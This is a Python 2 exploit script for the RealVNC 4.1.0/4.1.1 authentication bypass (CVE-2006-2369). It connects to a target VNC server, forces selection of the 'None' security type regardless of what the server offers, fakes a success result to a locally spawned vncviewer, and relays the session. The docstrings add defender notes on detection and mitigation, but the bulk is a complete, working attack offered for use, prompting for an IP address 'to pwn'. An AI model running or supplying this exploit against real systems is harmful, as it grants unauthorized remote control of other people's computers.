# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
# Date: 2012-05-13
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1.0 and 4.1.1
# Tested on: Windows XP
# CVE: CVE-2006-2369
# Requires vncviewer installed
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
import select
import thread
import os
import socket
import sys, re
# Address and port of the local listener that the spawned vncviewer connects
# to.  Loopback only, so the relayed VNC session is not reachable from other
# hosts; both values are also interpolated into the vncviewer command line.
BIND_ADDR = '127.0.0.1'
BIND_PORT = 4444
def pwn4ge(host, port):
    """Relay a local vncviewer through the CVE-2006-2369 auth bypass (Python 2 only).

    Flow: connect to the VNC server at ``(host, port)``, require the 12-byte
    ``RFB 003.008`` banner, accept one local vncviewer on
    ``BIND_ADDR:BIND_PORT`` (spawned here via ``os.system``), rewrite the
    security-type negotiation in both directions, then copy bytes between the
    two sockets until either side closes.

    Args:
        host: VNC server address (the caller has already run ``inet_aton`` on it).
        port: VNC server TCP port.

    Returns:
        Never returns normally; every path ends in ``sys.exit()``.

    Defender notes: the bypass is the single-byte security-type selection sent
    to the server below -- type 1 ("None") is chosen without looking at what
    the server offered.  On the wire, a client selecting type 1 after the
    server offered only other types is the indicator of this attack.
    Mitigation is to upgrade past the affected 4.1.0/4.1.1 releases and to
    keep VNC off untrusted networks.
    """
    socket.setdefaulttimeout(5)
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.connect((host, port))
    except socket.error, msg:
        print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
        sys.exit();
    else:
        # The "vulnerable" decision rests on the protocol banner alone: any
        # server announcing RFB 3.8 passes this check, whatever product it is.
        hello = server.recv(12)
        print "[*] Hello From Server: " + hello
        if hello != "RFB 003.008\n":
            print "[*] The remote VNC service is not vulnerable"
            sys.exit()
        else:
            print "[*] The remote VNC service is vulnerable"
            # Local hop for the real viewer, bound to loopback (BIND_ADDR).
            listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                listener.bind((BIND_ADDR, BIND_PORT))
            except socket.error , msg:
                print '[*] Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
                sys.exit()
            print "[*] Listener Socket Bind Complete"
            listener.listen(10)
            print "[*] Launching local vncviewer"
            # os.system runs a shell string, but it is built only from the two
            # module constants, so no user-controlled text reaches the shell.
            # It blocks until vncviewer exits, hence the separate thread.
            thread.start_new_thread(os.system,('vncviewer ' + BIND_ADDR + '::' + str(BIND_PORT),))
            print "[*] Listener waiting for VNC connections on localhost"
            # Exactly one viewer is served: the listener is closed after accept().
            client, caddr = listener.accept()
            listener.close()
            # Version exchange is passed through unchanged in both directions.
            client.send(hello)
            chello = client.recv(12)
            server.send(chello)
            # Server's security-type list: 2 bytes are read, never inspected.
            methods = server.recv(2)
            print "[*] Auth Methods Recieved. Sending Null Authentication Option to Client"
            # Offer the viewer a one-entry list containing only type 1 (None)
            # and consume its 1-byte choice ...
            client.send("\x01\x01")
            client.recv(1)
            # ... then select type 1 towards the server regardless of what it
            # offered -- this unchecked selection is the CVE-2006-2369 bypass.
            server.send("\x01")
            # The 4-byte SecurityResult from the server is read and discarded;
            # the viewer is told success (0) unconditionally.
            server.recv(4)
            client.send("\x00\x00\x00\x00")
            print "[*] Proxying data between the connections..."
            # Bidirectional copy.  A zero-length recv means that side closed:
            # the flag ends the loop (an empty send still happens) and the
            # server branch is skipped once the client has gone.
            running = True
            while running:
                selected = select.select([client, server], [], [])[0]
                if client in selected:
                    buf = client.recv(8192)
                    if len(buf) == 0:
                        running = False
                    server.send(buf)
                if server in selected and running:
                    buf = server.recv(8192)
                    if len(buf) == 0:
                        running = False
                    client.send(buf)
                pass
            client.close()
            server.close()
            sys.exit()
def printUsage():
    """Write the one-line usage hint to stdout."""
    hint = "[*] Read the source, Luke!"
    sys.stdout.write(hint + "\n")
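def main():
    """Entry point: take target host/port from argv, else prompt, then run pwn4ge.

    ``argv[1]`` is the host and ``argv[2]`` the port; with fewer arguments the
    host is read interactively and the port defaults to 5900.  The host must be
    accepted by ``socket.inet_aton`` and the port must be an integer, otherwise
    only the usage hint is printed.
    """
    try:
        SERV_ADDR = sys.argv[1]
        SERV_PORT = sys.argv[2]
    except IndexError:
        # Only a missing argument should fall back to the prompt; the former
        # bare ``except:`` also swallowed KeyboardInterrupt and SystemExit.
        SERV_ADDR = raw_input("[*] Please input an IP address to pwn: ")
        SERV_PORT = 5900
    try:
        socket.inet_aton(SERV_ADDR)
        # A non-numeric argv[2] previously escaped as an uncaught ValueError.
        port = int(SERV_PORT)
    except (socket.error, ValueError):
        printUsage()
    else:
        pwn4ge(SERV_ADDR, port)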
if __name__ == "__main__":
    # Script entry point; importing the module only defines constants and
    # functions, nothing is sent until main() runs.
    main()